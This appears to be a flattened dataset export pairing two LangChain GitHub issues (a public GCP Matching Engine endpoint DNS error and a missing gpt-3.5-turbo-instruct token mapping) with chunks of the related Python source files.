status
stringclasses 1
value | repo_name
stringclasses 31
values | repo_url
stringclasses 31
values | issue_id
int64 1
104k
| title
stringlengths 4
233
| body
stringlengths 0
186k
⌀ | issue_url
stringlengths 38
56
| pull_url
stringlengths 37
54
| before_fix_sha
stringlengths 40
40
| after_fix_sha
stringlengths 40
40
| report_datetime
unknown | language
stringclasses 5
values | commit_datetime
unknown | updated_file
stringlengths 7
188
| chunk_content
stringlengths 1
1.03M
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls: Type["MatchingEngine"],
project_id: str,
region: str,
gcs_bucket_name: str,
index_id: str,
endpoint_id: str,
credentials_path: Optional[str] = None,
embedding: Optional[Embeddings] = None,
) -> "MatchingEngine":
"""Takes the object creation out of the constructor.
Args:
project_id: The GCP project id.
region: The default location making the API calls. It must have
the same location as the GCS bucket and must be regional.
gcs_bucket_name: The location where the vectors will be stored in
order for the index to be created.
index_id: The id of the created index.
endpoint_id: The id of the created endpoint.
credentials_path: (Optional) The path of the Google credentials on
the local file system.
embedding: The :class:`Embeddings` that will be used for
embedding the texts.
Returns:
A configured MatchingEngine with the texts added to the index.
"""
gcs_bucket_name = cls._validate_gcs_bucket(gcs_bucket_name)
credentials = cls._create_credentials_from_file(credentials_path)
index = cls._create_index_by_id(index_id, project_id, region, credentials)
endpoint = cls._create_endpoint_by_id(
endpoint_id, project_id, region, credentials |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | )
gcs_client = cls._get_gcs_client(credentials, project_id)
cls._init_aiplatform(project_id, region, gcs_bucket_name, credentials)
return cls(
project_id=project_id,
index=index,
endpoint=endpoint,
embedding=embedding or cls._get_default_embeddings(),
gcs_client=gcs_client,
credentials=credentials,
gcs_bucket_name=gcs_bucket_name,
)
@classmethod
def _validate_gcs_bucket(cls, gcs_bucket_name: str) -> str:
"""Validates the gcs_bucket_name as a bucket name.
Args:
gcs_bucket_name: The received bucket uri.
Returns:
A valid gcs_bucket_name or throws ValueError if full path is
provided.
"""
gcs_bucket_name = gcs_bucket_name.replace("gs://", "")
if "/" in gcs_bucket_name:
raise ValueError(
f"The argument gcs_bucket_name should only be "
f"the bucket name. Received {gcs_bucket_name}"
)
return gcs_bucket_name
@classmethod
def _create_credentials_from_file( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls, json_credentials_path: Optional[str]
) -> Optional[Credentials]:
"""Creates credentials for GCP.
Args:
json_credentials_path: The path on the file system where the
credentials are stored.
Returns:
An optional of Credentials or None, in which case the default
will be used.
"""
from google.oauth2 import service_account
credentials = None
if json_credentials_path is not None:
credentials = service_account.Credentials.from_service_account_file(
json_credentials_path
)
return credentials
@classmethod
def _create_index_by_id( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls, index_id: str, project_id: str, region: str, credentials: "Credentials"
) -> MatchingEngineIndex:
"""Creates a MatchingEngineIndex object by id.
Args:
index_id: The created index id.
project_id: The project to retrieve index from.
region: Location to retrieve index from.
credentials: GCS credentials.
Returns:
A configured MatchingEngineIndex.
"""
from google.cloud import aiplatform
logger.debug(f"Creating matching engine index with id {index_id}.")
return aiplatform.MatchingEngineIndex(
index_name=index_id,
project=project_id,
location=region,
credentials=credentials,
)
@classmethod
def _create_endpoint_by_id( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls, endpoint_id: str, project_id: str, region: str, credentials: "Credentials"
) -> MatchingEngineIndexEndpoint:
"""Creates a MatchingEngineIndexEndpoint object by id.
Args:
endpoint_id: The created endpoint id.
project_id: The project to retrieve index from.
region: Location to retrieve index from.
credentials: GCS credentials.
Returns:
A configured MatchingEngineIndexEndpoint.
"""
from google.cloud import aiplatform
logger.debug(f"Creating endpoint with id {endpoint_id}.")
return aiplatform.MatchingEngineIndexEndpoint(
index_endpoint_name=endpoint_id,
project=project_id,
location=region,
credentials=credentials,
)
@classmethod
def _get_gcs_client( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls, credentials: "Credentials", project_id: str
) -> "storage.Client":
"""Lazily creates a GCS client.
Returns:
A configured GCS client.
"""
from google.cloud import storage
return storage.Client(credentials=credentials, project=project_id)
@classmethod
def _init_aiplatform( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls,
project_id: str,
region: str,
gcs_bucket_name: str,
credentials: "Credentials",
) -> None:
"""Configures the aiplatform library.
Args:
project_id: The GCP project id.
region: The default location making the API calls. It must have
the same location as the GCS bucket and must be regional.
gcs_bucket_name: GCS staging location.
credentials: The GCS Credentials object.
"""
from google.cloud import aiplatform
logger.debug(
f"Initializing AI Platform for project {project_id} on "
f"{region} and for {gcs_bucket_name}."
)
aiplatform.init(
project=project_id,
location=region,
staging_bucket=gcs_bucket_name,
credentials=credentials,
)
@classmethod
def _get_default_embeddings(cls) -> TensorflowHubEmbeddings: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | """This function returns the default embedding.
Returns:
Default TensorflowHubEmbeddings to use.
"""
return TensorflowHubEmbeddings() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | from __future__ import annotations
import logging
import sys
import warnings
from typing import (
AbstractSet,
Any,
AsyncIterator,
Callable,
Collection,
Dict,
Iterator,
List,
Literal,
Mapping,
Optional,
Set,
Tuple,
Union,
)
from langchain.callbacks.manager import (
AsyncCallbackManagerForLLMRun,
CallbackManagerForLLMRun,
)
from langchain.llms.base import BaseLLM, create_base_retry_decorator
from langchain.pydantic_v1 import Field, root_validator
from langchain.schema import Generation, LLMResult
from langchain.schema.output import GenerationChunk
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
from langchain.utils.utils import build_extra_kwargs |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | logger = logging.getLogger(__name__)
def update_token_usage(
keys: Set[str], response: Dict[str, Any], token_usage: Dict[str, Any]
